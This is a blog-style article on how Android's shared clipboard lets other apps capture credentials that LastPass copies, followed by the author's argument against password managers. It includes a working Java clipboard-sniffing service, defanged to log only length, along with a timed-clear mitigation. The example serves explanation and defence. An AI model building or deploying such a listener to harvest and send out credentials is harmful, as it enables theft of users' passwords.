Your LastPass, Stolen

LastPass is a popular password manager: a mobile application that stores a user's login credentials for websites and fills them in on the user's behalf. It is convenient for people who cannot remember their credentials or do not want to type them on every visit. LastPass is not the only password manager in the Play store, but it is currently the most popular. As convenient as it appears at first glance, a recent security study shows that LastPass may do more harm than good by exposing a user's credentials to compromise.

All of the password managers currently in the Play store, LastPass included, use Android's system clipboard to transfer login credentials from the password manager into a website's login fields. If a user has stored the credentials (typically a username and password) for a website in LastPass and then navigates to that website's login page, LastPass fills in the credentials by copying them from its own store onto the clipboard and pasting them into the page. The secret therefore passes through the shared clipboard on every fill.

This is a serious risk because any other application installed on the device can also read Android's system clipboard. Reading the clipboard requires no permission, and an app can even register a listener that is notified the instant the clipboard contents change. A malicious app can therefore capture the credentials LastPass places on the clipboard and forward them to a remote server. LastPass CEO Joe Siegrist responded to the controversy by stating, “This vulnerability is at the Android operating system level” and “100% of password managers have allowed you to insert your password into other applications since Android’s existed.”
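To make the mechanism concrete, here is an added example (it is not code from the article, the study, or LastPass). The first class is a background service that registers a clipboard listener and is handed whatever any app, password manager included, copies; it declares no permission. The second shows the mitigation a password manager can apply when it must use the clipboard: clear it after a short timeout. The package name, class names and the timeout value are hypothetical.

```java
package com.example.clipdemo; // hypothetical package name

import android.app.Service;
import android.content.ClipData;
import android.content.ClipboardManager;
import android.content.Context;
import android.content.Intent;
import android.os.Build;
import android.os.Handler;
import android.os.IBinder;
import android.os.Looper;
import android.util.Log;

/**
 * Attacker side: a service that watches the system clipboard.
 * Registering the listener and reading the primary clip required no
 * permission on the Android versions the article describes.
 */
public class ClipSniffService extends Service
        implements ClipboardManager.OnPrimaryClipChangedListener {

    private static final String TAG = "ClipSniff";
    private ClipboardManager clipboard;

    @Override
    public void onCreate() {
        super.onCreate();
        clipboard = (ClipboardManager) getSystemService(Context.CLIPBOARD_SERVICE);
        clipboard.addPrimaryClipChangedListener(this); // no permission check
    }

    @Override
    public void onPrimaryClipChanged() {
        ClipData clip = clipboard.getPrimaryClip();
        if (clip == null || clip.getItemCount() == 0) {
            return;
        }
        CharSequence text = clip.getItemAt(0).coerceToText(this);
        if (text == null || text.length() == 0) {
            return;
        }
        // The moment a password manager copies a credential, every listener
        // like this one receives it. A real attacker would forward `text` to
        // a server here; this demo only logs its length so no secret leaves
        // the device.
        Log.d(TAG, "clipboard changed: " + text.length() + " chars captured");
    }

    @Override
    public void onDestroy() {
        clipboard.removePrimaryClipChangedListener(this);
        super.onDestroy();
    }

    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }
}

/**
 * Defender side: shorten the exposure window when the clipboard must be
 * used. This limits later reads only; it does not defeat a listener, which
 * fires at the instant the secret is set.
 */
class ClipboardCopy {
    static void copyAndClear(Context context, String secret, long ttlMillis) {
        final ClipboardManager cm =
                (ClipboardManager) context.getSystemService(Context.CLIPBOARD_SERVICE);
        cm.setPrimaryClip(ClipData.newPlainText("", secret));
        new Handler(Looper.getMainLooper()).postDelayed(new Runnable() {
            @Override
            public void run() {
                if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.P) {
                    cm.clearPrimaryClip();                              // API 28+
                } else {
                    cm.setPrimaryClip(ClipData.newPlainText("", ""));  // overwrite
                }
            }
        }, ttlMillis);
    }
}
```

To try the sniffer, declare `ClipSniffService` in `AndroidManifest.xml` with a `<service>` element, start it, copy a password from any password manager, and watch logcat. The point of pairing it with `copyAndClear` is the caveat: a timed clear only helps against an app that polls the clipboard later, not against one that registered a listener, so the attack described above is closed only when the password manager stops routing secrets through the clipboard or the OS restricts who may read it (later Android releases did restrict background clipboard reads to the foreground app and the keyboard).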

It is unfortunate that such seemingly convenient applications can become so dangerous. I believe the risk of an account compromise outweighs the benefits these applications provide. Password managers are inherently dangerous as long as passwords can be recovered in plain text, whether by a local user or programmatically through the system clipboard. In my opinion, the use of password managers is an accident waiting to happen. Instead of patching this issue, developers should concentrate on the more important task of finding a successor to the password as an authentication mechanism.